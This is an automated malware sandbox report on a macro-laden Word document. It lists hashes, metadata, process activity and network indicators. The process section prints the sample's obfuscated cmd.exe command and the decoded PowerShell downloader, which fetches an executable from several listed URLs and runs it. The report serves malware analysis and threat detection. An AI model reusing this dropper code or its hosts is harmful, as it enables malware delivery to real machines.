analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

DOCI535970.doc

Full analysis: https://app.any.run/tasks/385b77d7-1118-41a5-8aba-d71fb96e65b5
Verdict: Malicious activity
Analysis date: November 14, 2018, 23:37:29
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Nov 14 17:27:00 2018, Last Saved Time/Date: Wed Nov 14 17:27:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0
MD5:

A109B47949EA76E837A23B670CA1883E

SHA1:

49F14EBA12771F28F90B2890BEDF065362703078

SHA256:

83DEE1F1990891EA38420EEC26C693D0D03AC4CE81A0F55961F873F24453DB1F

SSDEEP:

1536:+WzqUocn1kp59gxBK85fBt+a9Jx3GxdxoRlBsRghIxgBqx5xfxEBoxtBBB4xWDP:9M41k/W48DxuxoRlBsRghIxgBqx5xfx9

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2788)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2788)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 1576)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2544)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2788)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2788)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 14
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 13
Words: 2
Pages: 1
ModifyDate: 2018:11:14 17:27:00
CreateDate: 2018:11:14 17:27:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: -
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
34
Monitored processes
3
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2788"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\DOCI535970.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2544c:\wvBQHldjVqOM\YYZXLbOZn\HFAKEUwmzJ\..\..\..\windows\system32\cmd.exe /C"s^e^t ^[-^.=^'O^p^s';$n^Bf^='^htt&&set \^+?^.=^an^e^lapr&&^s^e^t ^#^,^$@=^.^P^at&&^s^e^t '^~=ervi&&s^e^t +^.=^w-Ob^j^ect&&^se^t ^#}^_=e^ll^ ^$z^Zo^=&&s^e^t ^[,*^+=n^t^s&&s^e^t '^`^.=^e&&^se^t ^;^]'^+=^8^@&&^s^et ^#`=^B&&^se^t ^}^`?=^h&&^se^t ^]^_\^*=^T&&^s^et '^\^@=N^Th.^t^yp&&s^e^t ^}`=^://^a^ion&&^s^e^t ^_^`~=^ow^er^s^h&&s^e^t {^]^'\=^.^s^en&&^s^e^t ^~^+=)^;$L^Ai^ ^=N^e&&^se^t ^*`^$=k^e^m^a^ler^k^o^l.net&&set ^-#=jZU);^Start&&s^e^t ^~^$^*=^h&&s^e^t ^-*^'=ht^tp^';$N^T^h^ &&^s^et ^]#^?=^om 'ad^o^d^b.^strea^m^'^;f&&s^e^t ^{^*^`}=n&&^s^e^t ^$.^*^}=v^e&&s^e^t ^@,^`=^.&&^se^t ^[+@^-=^$n&&se^t ?^.,^_=(^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&se^t $^.=^:/&&^se^t ;^?[^#=/n&&s^e^t ^*[^{^#=^m^ana&&^se^t #^{=n^t/&&^s^et ^,]^~=^o&&^se^t ,^?=^=^ Ne&&^s^et *^?,^\=^.^op&&s^e^t @^\^{=^b0^kQ^7&&^se^t ~^\=c^es&&^s^et ^#^]=^p&&^s^e^t #^.^-^'=^T'^,$Lr^G&&^s^e^t $^{`^@=Q&&^se^t `^]^*~=^p^://^zh^an&&^s^et ^.^3bb5484c-acd3-5883-ae5d-000aa204eed3
}=g^jia^b^ir^dn^e^s&&s^e^t .{-=^h^{&&s^e^t ^#^$^.@=^ ^ ^ ^ &&^se^t ]^-@^[=on^s^eB&&^se^t ^#^?=/&&^s^et ^+^{^\=^e ^=^ 1;f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&s^e^t ^,^`=com/w^p-c^o&&^se^t .^-=c&&^s^e^t ^\-^@=^ ^-c&&s^e^t ^$^-^+=N&&^s^et ^-*=^i.&&^se^t ^{^+^?^]=n^t^e&&^s^et *^-=^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^s^e^t ^@^-=^od^y)^;&&s^e^t ^+~^.=^d()^;^$N^Th&&s^e^t ^]}=^x^e'&&set \^]^'=^;$L^Ai&&^s^et ^~^#^@^'=^Obj^ec^t&&^s^e^t ^_^}'?=r&&^s^et @^[^,=r^each(f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&s^e^t ^$[*^`=()^;&&^se^t ^{~^*=^f)&&^s^e^t ^[^;^#=w^-&&^s^e^t ^,^\{=to^f^i^le&&^se^t '^*=^et^a^.&&^se^t ~^?^]^[=^ ^ &&^s^e^t #^+^*=^h^t^t^p:&&s^e^t ^'^.^#^?='^G^E&&^s^et ^]^`_^@=^$NT^h^.s^a&&^s^et ^{^}=^,0&&se^t ^$^~^[-=r^eak^}&&^s^e^t ^~\^?^}=c&&^s^et ^#^$^,=^y{^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&s^e^t ^}^?~^[=co/P^U^x^AY&&^s^e^t ^-^,}^.=-^P&&^se^t @^`=^wr^i^t^e(^$^L^Ai^.r&&^s^e^t ^{^.-=)&&^s^e^t ^,.=^}}^ ^ ^ ^ &&se^t ^~^+^?=^m^@^h^ttp&&^s^e^t ^[_=^.&&^s^e^t {^*=()+^'^\^Kj&&s^e^t @^~=u^p&&s^e^t ^~^_=@')&&^s^et [^}^.=^p^j^x^u'.Sp^l^it(^'&&^se^t ;^[=roc^e^s^s ^$^j^ZU;b&&^s^e^t ;^\^`^*=^h]&&^s^et ^\^-_=^a^tc&&s^e^t ^,}=^L^A&&s^e^t }^\]^[=^e^sp&&s^e^t {^+`=^[S^y^st^e^m.^IO&&^s^e^t ^[^?=^Lr^G ^in^ &&set ^$^@^[=l^o^a^ds/&&^s^e^t \^{^?_=^e&&s^e^t #^.^?=o^m^.^br&&^s^e^t ^+^@^,^.=l^2^.^x^ml&&^s^et ^*^}=^{^t&&^s^e^t '^\^?=t^.&&^s^e^t ^*.=@^ht^t^p://^p&&^s^et ^].=^ ^-c^o^m 'm^s^x^m&&^se^t ^?^~*=;^$j^Z^U^=(&&^se^t ^{?=^i.^o^p^e&&^se^t ^+^*=^:^:^G^et&&s^et [^~#^`=n(&&^se^t ^.^?^]=^Te^mpPa^t&&^se^t ^?^+$=^Y&&^s^e^t ^.}=/&&^s^et ^`^};-=^g^em^e&&s^e^t ^'{=//s^i^tran^t^or.^e^s/^L^d^Lr^6F^8^A@htt^p&&c^al^l ^s^e^t \[?=%^#^]%%^_^`~%%^#}^_%%^[-^.%%`^]^*~%%^.^3bb5484c-acd3-5883-ae5d-000aa204eed3
}%%'^\^?%%^}^?~^[%%^*.%%\^+?^.%%'^*%%.^-%%#^.^?%%^#^?%%@^\^{%%$^{`^@%%^;^]'^+%%#^+^*%%^'{%%^}`%%^*[^{^#%%^`^};-%%^[,*^+%%'^~%%~^\%%^@,^`%%^,^`%%^{^+^?^]%%#^{%%@^~%%^$^@^[%%^~^+^?%%$^.%%^.}%%^*`^$%%;^?[^#%%^?^+$%%[^}^.%%^~^_%%^?^~*%%{^+`%%^#^,^$@%%;^\^`^*%%^+^*%%^.^?^]%%^}^`?%%{^*%%^-*%%'^`^.%%^]}%%^~^+%%^[^;^#%%^~^#^@^'%%^].%%^+^@^,^.%%^-*^'%%,^?%%+^.%%^\-^@%%^]#^?%%^,]^~%%@^[^,%%^[^?%%^[+@^-%%^#`%%^{~^*%%^*^}%%^_^}'?%%^#^$^,%%^,}%%^{?%%[^~#^`%%^'^.^#^?%%#^.^-^'%%^{^}%%^{^.-%%\^]^'%%{^]^'\%%^+~^.%%*^?,^\%%\^{^?_%%^{^*^`}%%^$[*^`%%*^-%%'^\^@%%^+^{^\%%^$^-^+%%^]^_\^*%%^~^$^*%%^[_%%@^`%%}^\]^[%%]^-@^[%%^@^-%%^]^`_^@%%^$.^*^}%%^,^\{%%?^.,^_%%^-#%%^-^,}^.%%;^[%%^$^~^[-%%^~\^?^}%%^\^-_%%.{-%%^,.%%~^?^]^[%%^#^$^.@%&&ca^ll %\[?%"
c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1576powershell $zZo='Ops';$nBf='http://zhangjiabirdnest.co/PUxAY@http://panelapreta.com.br/b0kQ7Q8@http://sitrantor.es/LdLr6F8A@http://aionmanagementservices.com/wp-content/uploads/m@http://kemalerkol.net/nYpjxu'.Split('@');$jZU=([System.IO.Path]::GetTempPath()+'\Kji.exe');$LAi =New-Object -com 'msxml2.xmlhttp';$NTh = New-Object -com 'adodb.stream';foreach($LrG in $nBf){try{$LAi.open('GET',$LrG,0);$LAi.send();$NTh.open();$NTh.type = 1;$NTh.write($LAi.responseBody);$NTh.savetofile($jZU);Start-Process $jZU;break}catch{}} C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 336
Read events
935
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2788WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA0DF.tmp.cvr
MD5:
SHA256:
1576powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UQEAZ1KT4AYTG9PIU4OU.temp
MD5:
SHA256:
2788WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$CI535970.docpgc
MD5:9655049E2CDB186ECD3275F5028122C8
SHA256:69B7AE59E1EBD345BEF61376514FF591E54ADE5D1CFE0AD34155FCF45570F92F
1576powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
1576powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5dac58.TMPbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
2788WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:11DED0D8BBA3F810DECC0D504DB0ADD3
SHA256:595A99C1AE5BFC290647BC293DFFB43CCAD089D6FEA96D3D5C03EDA729FE8DE3
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1576
powershell.exe
GET
75.98.168.239:80
http://zhangjiabirdnest.co/PUxAY/
US
suspicious
1576
powershell.exe
GET
301
75.98.168.239:80
http://zhangjiabirdnest.co/PUxAY
US
html
241 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1576
powershell.exe
75.98.168.239:80
zhangjiabirdnest.co
A2 Hosting, Inc.
US
suspicious

DNS requests

Domain
IP
Reputation
zhangjiabirdnest.co
  • 75.98.168.239
suspicious

Threats

No threats detected
No debug info